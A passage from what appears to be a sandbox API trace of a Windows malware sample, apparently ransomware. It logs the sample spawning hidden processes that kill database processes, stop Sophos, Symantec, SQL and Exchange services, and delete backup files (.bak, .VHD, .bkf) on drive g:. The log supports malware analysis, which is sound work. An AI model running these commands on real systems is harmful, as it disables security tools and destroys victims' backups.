lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef88*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x2274d94 | out: lpCommandLine="\"taskkill.exe\" /IM CNTAoSMgr.exe /F", lpProcessInformation=0x2274d94*(hProcess=0x550, hThread=0x4b0, dwProcessId=0x10b4, dwThreadId=0x1024)) returned 1 [0149.492] CloseHandle (hObject=0x504) returned 1 [0149.492] GetFileType (hFile=0x464) returned 0x3 [0149.492] CloseHandle (hObject=0x4b0) returned 1 [0150.170] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.171] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x504, hWritePipe=0x5f2f044*=0x558) returned 1 [0150.171] GetCurrentProcess () returned 0xffffffff [0150.171] GetCurrentProcess () returned 0xffffffff [0150.171] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x174) returned 1 [0150.171] CloseHandle (hObject=0x504) returned 1 [0150.171] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.171] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0150.171] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0150.171] CoTaskMemFree (pv=0x741d20) [0150.171] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM sqlwriter.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef88*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x2505edc | out: lpCommandLine="\"taskkill.exe\" /IM sqlwriter.exe /F", lpProcessInformation=0x2505edc*(hProcess=0x568, hThread=0x504, dwProcessId=0x12d0, dwThreadId=0x4d4)) returned 1 [0150.310] CloseHandle (hObject=0x558) returned 1 [0150.310] GetFileType (hFile=0x174) returned 0x3 [0150.310] CloseHandle (hObject=0x504) returned 1 [0150.311] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.577] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.793] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.237] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.831] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.082] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0154.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.992] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.992] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x5dc, hWritePipe=0x5f2f044*=0x558) returned 1 [0155.992] GetCurrentProcess () returned 0xffffffff [0155.992] GetCurrentProcess () returned 0xffffffff [0155.992] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x588) returned 1 [0155.992] CloseHandle (hObject=0x5dc) returned 1 [0155.992] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.992] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0155.992] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0155.993] CoTaskMemFree (pv=0x741d20) [0155.993] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"del.exe\" /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g:\\*.dsk", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2eee4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x256f880 | out: lpCommandLine="\"del.exe\" /s /f /q g:\\*.VHD g:\\*.bac g:\\*.bak g:\\*.wbcat g:\\*.bkf g:\\Backup*.* g:\\backup*.* g:\\*.set g:\\*.win g:\\*.dsk", lpProcessInformation=0x256f880*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0155.993] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x5f2ee18, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0155.994] CloseHandle (hObject=0x558) returned 1 [0155.995] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.030] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.714] CoUninitialize () Thread: id = 499 os_tid = 0xebc [0104.490] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0104.490] CoGetContextToken (in: pToken=0x616f614 | out: pToken=0x616f614) returned 0x0 [0104.490] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x616f638 | out: ppvObject=0x616f638*=0x6ded34) returned 0x0 [0104.491] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x616f664 | out: pThreadType=0x616f664*=0) returned 0x0 [0104.491] IUnknown:Release (This=0x6ded34) returned 0x1 [0104.491] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0104.491] CoUninitialize () [0105.623] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.623] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3b4, hWritePipe=0x616ef94*=0x448) returned 1 [0105.623] GetCurrentProcess () returned 0xffffffff [0105.623] GetCurrentProcess () returned 0xffffffff [0105.623] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x468) returned 1 [0105.623] CloseHandle (hObject=0x3b4) returned 1 [0105.623] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.623] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.623] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.624] CoTaskMemFree (pv=0x741d20) [0105.624] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop msftesql$PROD /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x23b2464 | out: lpCommandLine="\"net.exe\" stop msftesql$PROD /y", lpProcessInformation=0x23b2464*(hProcess=0x3a0, hThread=0x3b4, dwProcessId=0xf38, dwThreadId=0x874)) returned 1 [0105.634] CloseHandle (hObject=0x448) returned 1 [0105.634] GetFileType (hFile=0x468) returned 0x3 [0105.634] CloseHandle (hObject=0x3b4) returned 1 [0106.364] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.364] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x47c) returned 1 [0106.364] GetCurrentProcess () returned 0xffffffff [0106.364] GetCurrentProcess () returned 0xffffffff [0106.364] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4a8) returned 1 [0106.364] CloseHandle (hObject=0x448) returned 1 [0106.364] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.364] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.364] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.364] CoTaskMemFree (pv=0x741d20) [0106.364] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop SstpSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x23fed94 | out: lpCommandLine="\"net.exe\" stop SstpSvc /y", lpProcessInformation=0x23fed94*(hProcess=0x4a4, hThread=0x448, dwProcessId=0x101c, dwThreadId=0x1020)) returned 1 [0106.387] CloseHandle (hObject=0x47c) returned 1 [0106.387] GetFileType (hFile=0x4a8) returned 0x3 [0106.387] CloseHandle (hObject=0x448) returned 1 [0106.387] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.387] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x47c) returned 1 [0106.387] GetCurrentProcess () returned 0xffffffff [0106.387] GetCurrentProcess () returned 0xffffffff [0106.387] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4b0) returned 1 [0106.387] CloseHandle (hObject=0x448) returned 1 [0106.387] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.388] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.388] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.388] CoTaskMemFree (pv=0x741d20) [0106.388] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSExchangeMTA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x24296f8 | out: lpCommandLine="\"net.exe\" stop MSExchangeMTA /y", lpProcessInformation=0x24296f8*(hProcess=0x4ac, hThread=0x448, dwProcessId=0x1024, dwThreadId=0x1028)) returned 1 [0106.392] CloseHandle (hObject=0x47c) returned 1 [0106.392] GetFileType (hFile=0x4b0) returned 0x3 [0106.392] CloseHandle (hObject=0x448) returned 1 [0106.393] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.393] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x47c) returned 1 [0106.393] GetCurrentProcess () returned 0xffffffff [0106.393] GetCurrentProcess () returned 0xffffffff [0106.393] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4b8) returned 1 [0106.393] CloseHandle (hObject=0x448) returned 1 [0106.393] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.393] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.393] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.393] CoTaskMemFree (pv=0x741d20) [0106.393] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos Device Control Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eebc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x242d028 | out: lpCommandLine="\"net.exe\" stop “Sophos Device Control Service” /y", lpProcessInformation=0x242d028*(hProcess=0x4b4, hThread=0x448, dwProcessId=0x102c, dwThreadId=0x1030)) returned 1 [0106.399] CloseHandle (hObject=0x47c) returned 1 [0106.399] GetFileType (hFile=0x4b8) returned 0x3 [0106.400] CloseHandle (hObject=0x448) returned 1 [0106.400] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.400] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x47c) returned 1 [0106.400] GetCurrentProcess () returned 0xffffffff [0106.400] GetCurrentProcess () returned 0xffffffff [0106.400] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4c0) returned 1 [0106.400] CloseHandle (hObject=0x448) returned 1 [0106.400] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.400] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.400] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.400] CoTaskMemFree (pv=0x741d20) [0106.400] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ReportServer$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eecc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x2430910 | out: lpCommandLine="\"net.exe\" stop ReportServer$SYSTEM_BGC /y", lpProcessInformation=0x2430910*(hProcess=0x4bc, hThread=0x448, dwProcessId=0x1034, dwThreadId=0x1038)) returned 1 [0106.405] CloseHandle (hObject=0x47c) returned 1 [0106.405] GetFileType (hFile=0x4c0) returned 0x3 [0106.405] CloseHandle (hObject=0x448) returned 1 [0106.405] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.405] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x47c) returned 1 [0106.405] GetCurrentProcess () returned 0xffffffff [0106.405] GetCurrentProcess () returned 0xffffffff [0106.406] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4c8) returned 1 [0106.406] CloseHandle (hObject=0x448) returned 1 [0106.406] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.406] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.406] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.406] CoTaskMemFree (pv=0x741d20) [0106.406] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Symantec System Recovery” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eec8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x24341ec | out: lpCommandLine="\"net.exe\" stop “Symantec System Recovery” /y", lpProcessInformation=0x24341ec*(hProcess=0x4c4, hThread=0x448, dwProcessId=0x103c, dwThreadId=0x1040)) returned 1 [0106.411] CloseHandle (hObject=0x47c) returned 1 [0106.411] GetFileType (hFile=0x4c8) returned 0x3 [0106.411] CloseHandle (hObject=0x448) returned 1 [0106.411] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.411] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x47c) returned 1 [0106.412] GetCurrentProcess () returned 0xffffffff [0106.412] GetCurrentProcess () returned 0xffffffff [0106.412] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4d0) returned 1 [0106.412] CloseHandle (hObject=0x448) returned 1 [0106.412] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.412] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.412] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.412] CoTaskMemFree (pv=0x741d20) [0106.412] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSOLAP$SQL_2008 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eedc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x2437abc | out: lpCommandLine="\"net.exe\" stop MSOLAP$SQL_2008 /y", lpProcessInformation=0x2437abc*(hProcess=0x4cc, hThread=0x448, dwProcessId=0x1044, dwThreadId=0x1048)) returned 1 [0106.423] CloseHandle (hObject=0x47c) returned 1 [0106.423] GetFileType (hFile=0x4d0) returned 0x3 [0106.423] CloseHandle (hObject=0x448) returned 1 [0106.423] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.423] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x448, hWritePipe=0x616ef94*=0x47c) returned 1 [0106.423] GetCurrentProcess () returned 0xffffffff [0106.423] GetCurrentProcess () returned 0xffffffff [0106.423] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4d8) returned 1 [0106.423] CloseHandle (hObject=0x448) returned 1 [0106.423] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.423] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.423] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.423] CoTaskMemFree (pv=0x741d20) [0106.424] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop UI0Detect /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x47c, hStdError=0x0), lpProcessInformation=0x243b370 | out: lpCommandLine="\"net.exe\" stop UI0Detect /y", lpProcessInformation=0x243b370*(hProcess=0x4d4, hThread=0x448, dwProcessId=0x104c, dwThreadId=0x1050)) returned 1 [0106.917] CloseHandle (hObject=0x47c) returned 1 [0106.925] GetFileType (hFile=0x4d8) returned 0x3 [0106.925] CloseHandle (hObject=0x448) returned 1 [0109.814] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0109.814] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x4f8, hWritePipe=0x616ef94*=0x3e0) returned 1 [0109.814] GetCurrentProcess () returned 0xffffffff [0109.814] GetCurrentProcess () returned 0xffffffff [0109.814] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x448) returned 1 [0109.814] CloseHandle (hObject=0x4f8) returned 1 [0109.814] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0109.815] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0109.815] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0109.815] CoTaskMemFree (pv=0x741d20) [0109.815] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSExchangeSA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2271e0c | out: lpCommandLine="\"net.exe\" stop MSExchangeSA /y", lpProcessInformation=0x2271e0c*(hProcess=0x3c4, hThread=0x4f8, dwProcessId=0x1148, dwThreadId=0x114c)) returned 1 [0109.931] CloseHandle (hObject=0x3e0) returned 1 [0109.931] GetFileType (hFile=0x448) returned 0x3 [0109.931] CloseHandle (hObject=0x4f8) returned 1 [0111.680] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.680] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, 